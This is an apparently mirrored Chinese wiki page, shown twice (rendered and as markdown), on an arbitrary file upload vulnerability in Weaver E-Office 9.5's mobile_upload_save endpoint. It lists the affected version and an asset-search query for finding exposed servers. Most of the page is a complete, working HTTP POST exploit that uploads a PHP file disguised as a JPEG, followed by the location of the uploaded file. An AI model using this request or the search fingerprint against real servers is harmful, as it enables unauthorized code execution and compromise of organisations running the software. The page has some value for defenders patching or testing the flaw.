fofamini-wiki

登录白背景

源码

泛微E-Office mobile_upload_save存在任意文件上传漏洞

一、漏洞简介

泛微 E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。泛微 E-Office 9.5版本存在代码问题漏洞，该漏洞源于App/Ajax/ajax.php?action=mobile_upload_save 存在未知函数，通过参数 upload_quwan 导致不受限制的上传。

二、影响版本

泛微 E-Office 9.5

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 338
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

根据响应得到上传文件位置

/attachment/3042759248/1.php

原文: https://www.yuque.com/xiaokp7/ocvun2/izfyce41w57dmfeg

# 泛微E-Office mobile_upload_save存在任意文件上传漏洞

# 一、漏洞简介
泛微 E-Office是中国泛微科技（Weaver）公司的一个协同办公系统。泛微 E-Office 9.5版本存在代码问题漏洞，该漏洞源于App/Ajax/ajax.php?action=mobile_upload_save 存在未知函数，通过参数 upload_quwan 导致不受限制的上传。

# 二、影响版本

- 泛微 E-Office 9.5

# 三、资产测绘

- hunter`app.name="泛微 e-office OA"`
- 特征

![image.png](./img/RMqEZGdqqaErtlbF/1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e-123297.png)

# 四、漏洞复现
```
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 338
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
```
![image.png](./img/RMqEZGdqqaErtlbF/1699626669991-b622f22d-33d0-4674-af9f-4d9b8294e30e-189013.png)
根据响应得到上传文件位置
```
/attachment/3042759248/1.php
```
![image.png](./img/RMqEZGdqqaErtlbF/1699626714042-d6eda33d-f0a4-4ae2-a649-69dbe68282ec-106882.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/izfyce41w57dmfeg>